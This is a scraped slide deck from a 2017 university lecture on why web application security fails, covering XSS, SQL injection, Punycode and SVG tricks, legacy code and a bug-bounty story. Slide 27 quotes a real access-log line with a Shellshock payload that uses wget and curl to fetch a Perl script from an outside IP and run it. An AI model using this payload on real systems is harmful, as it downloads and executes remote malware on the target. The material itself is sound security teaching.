Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
 
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIEnchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 

Webapp security-tut-2017

  • 1. HOW AND WHY WEB APP SECURITY FAILS? 16.2. 2017 Tampere University of Technology Antti.virtanen@solita.fi Twitter: @Anakondantti
  • 2. FOREWORD, 1 MINUTE › Solita? › Me? › Web application? • Much more important than you may realize..
  • 3. AGENDA › How to make secure software? › … But, everything is broken! › … Because ... • Same mistakes are repeated. • Unthinkable, Unpossible, Impossiblator happens › Practical web application security testing. › Bonus: 10. fail 20. goto 10
  • 5. ”“If you know the enemy and know yourself, you need not fear the result of a hundred battles. ” Sun Tzu, Art of War
  • 6. Source: Hackerman, Kung Fury movie Source: NSA recruitment video. Source: securityintelligence.com Source: Lizard Squad hacking group logo
  • 8. GOOD NEWS: SECURITY IS SIMPLE! Bad news: Simple != easy
  • 9. RECIPE FOR SECURE SOFTWARE 1. Design it properly. Do the right thing. 2. Do it right 1. Mistake in implementation = bug = security issue 3. Prepare for the unthinkable (Bug bounties etc. are useful too, but out of scope here.)
  • 10. DO THE RIGHT THING 1. Don’t roll your own. 1. Especially, don’t invent hash algorithms, RND or crypto! 2. Seriously. Failure imminent and certain. 2. Follow best practices. 3. Understand what you are doing. 1. Read the RFC. Understand your tools and libs.
  • 11. SOMETHING UNTHINKABLE It’s the same story every day..
  • 13. UNTHINKABLE DOMAINS AND DNS RECORDS (PUNY CODE ATTACK)
  • 14. A PICTURE IS WORTH 1000 WORDS › Demo-time: SVG is a picture file, right? › Feeling lucky, punk?
  • 15. WHAT THE ACTUAL **** ??
  • 17. THE SAME STORY ALL OVER! › XSS, CSRF, SQL injection, XXE.. • Are all about input validation. › Solution: white list allowed, deny everythingelse. › There’s still 20% left • You can fail session management certainly, but.. • Follow the advice: Don’t invent your own and you’ll be pretty safe.
  • 19. JAVASCRIPT IS FULL OF EVIL (GREPPING “EVIL” FROM JS SOURCES)
  • 20. The most satisfying feeling you can get in the job is... The Pwn. Let's say you find SQL injection. Blood is rushing into your brain and that's what we call The Pwn. Your brain gets a really tight feeling, like your head is going to explode any minute,. Arnold“Iceman” Schwarzenegger, movie Pwningiron.
  • 22. LET’S XSS ! › Reflected vs. Stored › <script> doesn’t work? • No problem, JS is everywhere.. › Can’t XMLHttpRequest? • No prob, counter and fake
  • 23. SQL INJECTION › GRUYERE does not contain SQL injection.. › But .. It’s a good example of an injection › SQL = Structured Query Language • However, “query” is a bit of a misnomer.. What is this???
  • 25. LOGIC ATTACKS ARE DIFFICULT › Real example..
  • 27. FROM A REAL ACCESS LOG (CUSTOMER IP REDACTED) › 2015-02-09:2015-02-09 09:17:01,420 INFO xxxx.infra.print- wrapper: Request 387280 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx" ,referer: ,oid: Google tip:Shellshock
  • 28. WHAT THE ATTACKER WANTED? efixx– first lines.. core – first lines..
  • 29. DEV OR OPS? OR #DEVSEC ? › Who is responsible for that server? › Do you need to care as a developer? › Ultimately: What is the developer’s responsibility?
  • 30. SOME FAILS 2016-­2017 Stories from the trenches
  • 31. FAIL 1: THE BURDEN OF LEGACY MD5 & C++ -­ “ELEGANT WEAPONS .. FOR A MORE CIVILIZED AGE” › Native code is dangerous.. • ASLR & DEP make buffer overflows more difficult to exploit, but it still happens. › The lifespan of software can be surprisingly long.. • How to update and re-evaluate working software if nothing happens? • Home-exercise: Sell this to team & customer. Involves risk and cost. › New threats have emerged. • What parts are affected?
  • 32. Screeshot removed.. FAIL 2: SHORTCUTS AND ANARCHY › Root cause: Heavy process, not understood / accepted by devs • making developers miserable.. › The devs are innovative people.. http//unauthorized.. V 1.3 coolserver AwesomeSoftware_Upgrade.exe
  • 33. FAIL 3: “I ACCIDENTALLY”
  • 34. STORY 4: THE WEBHACK EVENT › http://webhack.fi was a light-weight fun bug bounty hunt.. • The targets are not publicly accessible, but were production systems we created for our customers. › Hackers hacked.. › .. SQL injection -> dumped the whole database › .. But our code was fine! WAT?
  • 35. ONE DOES NOT SIMPLY INJECT INTO.. › One issue turned out to be a 0-day in Spring libraries.. › Hnggh.. › The moral of the story is two-fold: 1. even if you do everything right, you can still fail 2. it’s not always so easy in real life.. › The gory details: https://github.com/solita/sqli-poc
  • 36. FURTHER MATERIAL • Fromthe internet: • OWASP Top10 • https://www.owasp.o rg/index.php/Categor y:OWASP_Top_Ten_ Project • OWASP ZAP proxy • https://www.owasp.o rg/index.php/OWAS P_Zed_Attack_Proxy _Project • KaliLinux • https://www.kali.org /